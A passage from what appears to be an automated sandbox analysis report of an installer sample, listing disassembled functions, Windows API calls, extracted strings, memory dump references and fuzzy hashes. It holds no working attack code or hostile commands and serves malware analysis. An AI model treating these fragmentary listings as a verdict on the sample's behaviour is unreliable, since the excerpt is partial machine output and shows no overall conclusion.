                                                                                    • Instruction Fuzzy Hash: F4415E30A04248EFDB51DFA8D896B9DBBF6FB46318F5584A9F804A7291C7B45F44CB20
                                                                                    Function 00650308 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005A2A3C: SetWindowTextW.USER32(?,00000000), ref: 005A2A6D
                                                                                    • ShowWindow.USER32(?,00000005,00000000,006505BC,?,?,00000000), ref: 0065034E
                                                                                      • Part of subcall function 005B09C4: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005B09D7
                                                                                      • Part of subcall function 00421594: SetCurrentDirectoryW.KERNEL32(00000000,?,00650376,00000000,00650583,?,?,00000005,00000000,006505BC,?,?,00000000), ref: 0042159F
                                                                                      • Part of subcall function 005B0518: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005B05AD,?,?,?,00000001,?,005FB63E,00000000,005FB6A9), ref: 005B054D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                    • String ID: .dat$.msg$IMsg$Uninstall
                                                                                    • API String ID: 3312786188-1660910688
                                                                                    • Opcode ID: 062fbde91890a9c7c71bdbdaff0e6b149ef8273d17b618ac53844c83cbed721d
                                                                                    • Instruction ID: f4c181762cbf351847136a24d252f6132ab9ebf6a138c6ef489f4fabac20360c
                                                                                    • Opcode Fuzzy Hash: 062fbde91890a9c7c71bdbdaff0e6b149ef8273d17b618ac53844c83cbed721d
                                                                                    • Instruction Fuzzy Hash: 5A416F34A006099FD700EFA8CD569AEBFB6FB89300F508465F900B7791DA75AE05DF51
                                                                                    Function 0064449C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006445EE,?,?,00000005,00000000,00000000,?,00650C25,00000000,00650DD8,?,00000000,00650E3C), ref: 00644527
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,006445EE,?,?,00000005,00000000,00000000,?,00650C25,00000000,00650DD8,?,00000000,00650E3C), ref: 00644530
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                    • API String ID: 1375471231-2952887711
                                                                                    • Opcode ID: cac10ad592e500dbc9321eb5b0c6fa4350d4f5f3ada15836020bf4f1a565dd9d
                                                                                    • Instruction ID: 8551b8634482954e3fd0c2332de757f57d69561d22e1e83ac04cf94fc86de4b6
                                                                                    • Opcode Fuzzy Hash: cac10ad592e500dbc9321eb5b0c6fa4350d4f5f3ada15836020bf4f1a565dd9d
                                                                                    • Instruction Fuzzy Hash: 29411074A001099BDB04EFA5D886ADEB7B7EF89304F50417AF400B7392DE74AE05CB69
                                                                                    Function 0065C4A4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0040EC94: GetModuleHandleW.KERNEL32(00000000,?,0065C4B7), ref: 0040ECA0
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0065C4C7
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0065C4E3
                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,0065C528), ref: 0065C4F8
                                                                                      • Part of subcall function 00651170: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0065C502,00000001,00000000,0065C528), ref: 0065117A
                                                                                      • Part of subcall function 005A2F2C: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005A2F51
                                                                                      • Part of subcall function 005A2A3C: SetWindowTextW.USER32(?,00000000), ref: 005A2A6D
                                                                                    • ShowWindow.USER32(?,00000005,00000000,0065C528), ref: 0065C562
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
                                                                                    • String ID: Setup
                                                                                    • API String ID: 1533765661-3839654196
                                                                                    • Opcode ID: f8c58ef73216a5b498c7f1e6a965958284e2f0dd262b70c0fb50f6e5d3e4fcef
                                                                                    • Instruction ID: 1b4fd68c5f12b7e95b75c71ee5b84b9948103f9578c114e64c2b51bfeab17fc8
                                                                                    • Opcode Fuzzy Hash: f8c58ef73216a5b498c7f1e6a965958284e2f0dd262b70c0fb50f6e5d3e4fcef
                                                                                    • Instruction Fuzzy Hash: 63218134204B02AFC300EF69DC96D567BEAFB4B360B1155B5F900CB7B1DAB4A850CB64
                                                                                    Function 00619ABC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000004FF), ref: 00619AEE
                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00619B11
                                                                                    • CloseHandle.KERNEL32(?,00619B44,000000FF,000004FF,00000000,00619B3D), ref: 00619B37
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                    • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                    • API String ID: 2573145106-3235461205
                                                                                    • Opcode ID: 242899fcc0be58cbc3ab360f2b663c78cae9d5b9790535ea214d61b29f3b34d3
                                                                                    • Instruction ID: 17f76d570b79bce70c84d933d727bccac0e9e9e67c25deff2b623aab18eb49ef
                                                                                    • Opcode Fuzzy Hash: 242899fcc0be58cbc3ab360f2b663c78cae9d5b9790535ea214d61b29f3b34d3
                                                                                    • Instruction Fuzzy Hash: 0C01F730708209AFDB10DBACDC62DEE77EAEB85724F140570F510C73D0DA38AD809625
                                                                                    Function 00405634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 0040566B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 00405671
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 00405680
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 00405691
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID: :
                                                                                    • API String ID: 1611563598-336475711
                                                                                    • Opcode ID: cfe5adf384c6779782b3d8b12f3b8a0230f146eb02df9a283bc8ffd2dbd2e46c
                                                                                    • Instruction ID: dce63c72c99c25e19be56c3ef1376a95404931ccd87f5083cd5fd4336c869f13
                                                                                    • Opcode Fuzzy Hash: cfe5adf384c6779782b3d8b12f3b8a0230f146eb02df9a283bc8ffd2dbd2e46c
                                                                                    • Instruction Fuzzy Hash: 94F0F061140B447AD320EB65C852AEB72DCDF44305F40883F7AC8D73D2E67E8948976A
                                                                                    Function 10011A40 Relevance: 7.6, APIs: 5, Instructions: 100fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 10011A61
                                                                                    • ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 10011A7B
                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,?), ref: 10011ACC
                                                                                    • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 10011AFD
                                                                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 10011B2C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?pbump@?$basic_streambuf@?pptr@?$basic_streambuf@?xsputn@?$basic_streambuf@Pnavail@?$basic_streambuf@fwrite
                                                                                    • String ID:
                                                                                    • API String ID: 1074265955-0
                                                                                    • Opcode ID: 5ddc3c7a704c1f435e1f2cf7b7af9729b09afe2cf8c3f8fc50bc04272bbf712c
                                                                                    • Instruction ID: f3b0000acd429ac5cb95c2efd876261dd8ef2d3ed187a2a6324a5f7f02af080d
                                                                                    • Opcode Fuzzy Hash: 5ddc3c7a704c1f435e1f2cf7b7af9729b09afe2cf8c3f8fc50bc04272bbf712c
                                                                                    • Instruction Fuzzy Hash: 9E41B075A04249EFDB48CF98C885ADEBBB5FF88314F10C559E92A9B250D774EA80CF50
                                                                                    Function 00CE6548 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: dllmain_raw$Main@12
                                                                                    • String ID:
                                                                                    • API String ID: 2964726511-0
                                                                                    • Opcode ID: 77c2d8ce7624c59a58bc0892d1e6724f43cbeeb330e080506059902503b60b19
                                                                                    • Instruction ID: 7ff2abd48b4d900504fcc8e3813c717a712c652835fe495ec6759c63a16bfd3e
                                                                                    • Opcode Fuzzy Hash: 77c2d8ce7624c59a58bc0892d1e6724f43cbeeb330e080506059902503b60b19
                                                                                    • Instruction Fuzzy Hash: 55219271E21299AFDB219F17CC41E6F7A69EBB0BD4F158129F82967214D3308E41ABD0
                                                                                    Function 005865CC Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf7bdf9da67ecc928336aab066482e6213c2e24160aca79d3e9667660882f776
                                                                                    • Instruction ID: 7ced4f6ac72d4b624eb87d8c68b941b316f9879e7a3a6f593d5052ea882bc33a
                                                                                    • Opcode Fuzzy Hash: cf7bdf9da67ecc928336aab066482e6213c2e24160aca79d3e9667660882f776
                                                                                    • Instruction Fuzzy Hash: D411A230A0029A9ADB307B3A595AB9A3F88BF81758F040429BD01FF246EE74DC5587A0
                                                                                    Function 00420F94 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FA4
                                                                                    • GetLastError.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FB3
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000), ref: 00420FBB
                                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000), ref: 00420FD6
                                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000), ref: 00420FE4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                                    • String ID:
                                                                                    • API String ID: 2814369299-0
                                                                                    • Opcode ID: abb7752b3b6d9ecc2b71773dca15c327e56584de84a87eac260585061ca53039
                                                                                    • Instruction ID: 6ebe3b4cf45532d28852752088064c3a0fe5d7edeb4f0602fc5494761cc484af
                                                                                    • Opcode Fuzzy Hash: abb7752b3b6d9ecc2b71773dca15c327e56584de84a87eac260585061ca53039
                                                                                    • Instruction Fuzzy Hash: 43F0A7613843211D9630397E29C9EFF158C894276DB55073FFA50D22A3C59D5D4A816E
                                                                                    Function 005A0B08 Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 005A0B1A
                                                                                    • SetEvent.KERNEL32(00000000), ref: 005A0B46
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005A0B4B
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 005A0B74
                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 005A0B81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2132507429-0
                                                                                    • Opcode ID: cbfe83d1defdd885ccca9dee31e8f3165b3cbbe1b1857a3439133bc7b73916d0
                                                                                    • Instruction ID: eeeb615204661b1aca082b56b3788136df217e3b650a30bde2679d9a32e7b538
                                                                                    • Opcode Fuzzy Hash: cbfe83d1defdd885ccca9dee31e8f3165b3cbbe1b1857a3439133bc7b73916d0
                                                                                    • Instruction Fuzzy Hash: 2701AD70228204AFCB00EF68DE06B9D3BE8FB05314F005A2AF654C71E4E7B49880CB66
                                                                                    Function 00407FC0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00407FDF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: (lB$0mB$X7@
                                                                                    • API String ID: 3192549508-2219141271
                                                                                    • Opcode ID: f82d1333549365f0fed0bc7ce00f205c8481b44007d847b9f86f21765ec94855
                                                                                    • Instruction ID: fe59e1eddae76fe630356f0a463a62f130d135cc9e4f47475fc7b96310d26dbb
                                                                                    • Opcode Fuzzy Hash: f82d1333549365f0fed0bc7ce00f205c8481b44007d847b9f86f21765ec94855
